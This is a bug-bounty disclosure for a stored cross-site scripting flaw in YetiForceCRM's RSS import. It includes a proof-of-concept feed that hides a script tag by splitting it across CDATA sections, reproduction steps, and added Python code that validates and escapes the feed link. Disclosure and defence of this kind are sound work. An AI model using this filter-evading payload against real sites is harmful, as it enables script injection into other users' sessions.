huntr report D6EAA453-9758-41B7-8C38-FD878D6AEAB4

Stored XSS vulnerability when importing RSS Feeds from external source

Reported by 0xb4c on www.huntr.dev, 2022-08-12 07:34:48

EPSS: 0.001 (Low), percentile 21.6%

Description

YetiForceCRM allows users to create RSS feeds without properly sanitizing the link field of data fetched from an external source. An attacker can take advantage of this to perform an XML injection that results in stored cross-site scripting (XSS) on the target server.

Proof of Concept

Payload

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
    <title>RSS Test</title>
    <link><![CDATA["]]><![CDATA[>]]><![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]></link>
    <description>RSS Test Description</description>
    <lastBuildDate>Fri, 12 Aug 2022 00:00:00 -0000</lastBuildDate>
    <item>
        <title>RSS Test</title>
        <link>http://example.com</link>
        <description>a post</description>
        <author>[email protected]</author>
        <pubDate>Fri, 12 Aug 2022 00:00:00 -0000</pubDate>
    </item>
</channel>
</rss>
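The payload above works because a conforming XML parser concatenates adjacent CDATA sections with the surrounding character data, so a filter that scans the raw feed for a literal script tag never sees one, while the parsed value of the link field is a complete script element. The following is an added example, not code from the advisory or from YetiForceCRM: it parses a feed the way an importer would, validates the channel link as an absolute http(s) URL before it is stored, and escapes it on output. It uses only the Python standard library so it runs offline; the sample feeds are constructed from the payload above, and the suggestion to use defusedxml for untrusted feeds in production is an assumption, not something the advisory states.

```python
# Added example, not code from the advisory or from YetiForceCRM.
# Parses an RSS feed the way a CRM importer would, then validates the channel
# <link> as a URL before storage and escapes it on output. Only the standard
# library is used so it runs offline; for untrusted feeds in production,
# defusedxml.ElementTree is the usual drop-in replacement (assumption, not used here).
import html
import xml.etree.ElementTree as ET
from typing import Optional
from urllib.parse import urlparse

# Constructed sample: the advisory's PoC feed, with the <link> value split
# across several CDATA sections.
MALICIOUS_FEED = b"""<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
    <title>RSS Test</title>
    <link><![CDATA["]]><![CDATA[>]]><![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]></link>
    <description>RSS Test Description</description>
    <item>
        <title>RSS Test</title>
        <link>http://example.com</link>
        <description>a post</description>
    </item>
</channel>
</rss>"""

# Constructed sample: a well-formed feed whose <link> is an ordinary URL.
BENIGN_FEED = b"""<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
    <title>Example</title>
    <link>http://example.com/feed</link>
    <description>Benign feed</description>
</channel>
</rss>"""

ALLOWED_SCHEMES = {"http", "https"}


def extract_channel_link(feed_bytes: bytes) -> str:
    """Return the text of /rss/channel/link as a conforming XML parser sees it.

    Adjacent CDATA sections and plain character data are concatenated, so a
    filter that scans the raw bytes for a literal "<script>" never matches;
    the value to validate is the parsed text, not the wire form.
    """
    root = ET.fromstring(feed_bytes)
    link = root.find("./channel/link")
    if link is None:
        return ""
    return link.text or ""


def validate_feed_url(value: str) -> Optional[str]:
    """Accept only absolute http(s) URLs with a host; return None for anything else.

    Characters that are meaningful in HTML (quotes, angle brackets) and
    whitespace never appear raw in a valid URL, so they are rejected outright
    rather than passed through for later escaping to deal with.
    """
    candidate = value.strip()
    parsed = urlparse(candidate)
    if parsed.scheme.lower() not in ALLOWED_SCHEMES or not parsed.netloc:
        return None
    if any(c in candidate for c in "<>\"'") or any(c.isspace() for c in candidate):
        return None
    return candidate


def render_link_html(value: str) -> str:
    """Escape on output as well: storage-time validation is not the only line of defence."""
    safe = html.escape(value, quote=True)
    return f'<a href="{safe}">{safe}</a>'


def import_feed(feed_bytes: bytes) -> Optional[str]:
    """Full importer path: parse, validate, and return the value safe to store (or None)."""
    return validate_feed_url(extract_channel_link(feed_bytes))


if __name__ == "__main__":
    for name, feed in (("malicious", MALICIOUS_FEED), ("benign", BENIGN_FEED)):
        raw = extract_channel_link(feed)
        print(f"{name}: parsed link = {raw!r}")
        print(f"{name}: stored value = {import_feed(feed)!r}")
        print(f"{name}: escaped html = {render_link_html(raw)}")
```

Running the script shows the malicious feed's parsed link is the full script element even though no single CDATA section contains it; the validator rejects it because it has no URL scheme or host, and the output escaping neutralizes it in case a value ever reaches a template unvalidated. Both layers matter: the validator stops non-URL values such as javascript: links that escaping alone would leave clickable, and escaping covers any path that bypasses import-time validation.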

Reproduction steps

  • Step 1: Create a file rss_xss.xml with the content of the payload above
    [Screenshot: PoC - Step 1]

  • Step 2: Add a Feed Source via the Rss module
    [Screenshot: PoC - Step 2]

  • Step 3: Click Save and the XSS should fire
    [Screenshot: PoC - Step 3]
    [Screenshot: PoC - Step 3-2]
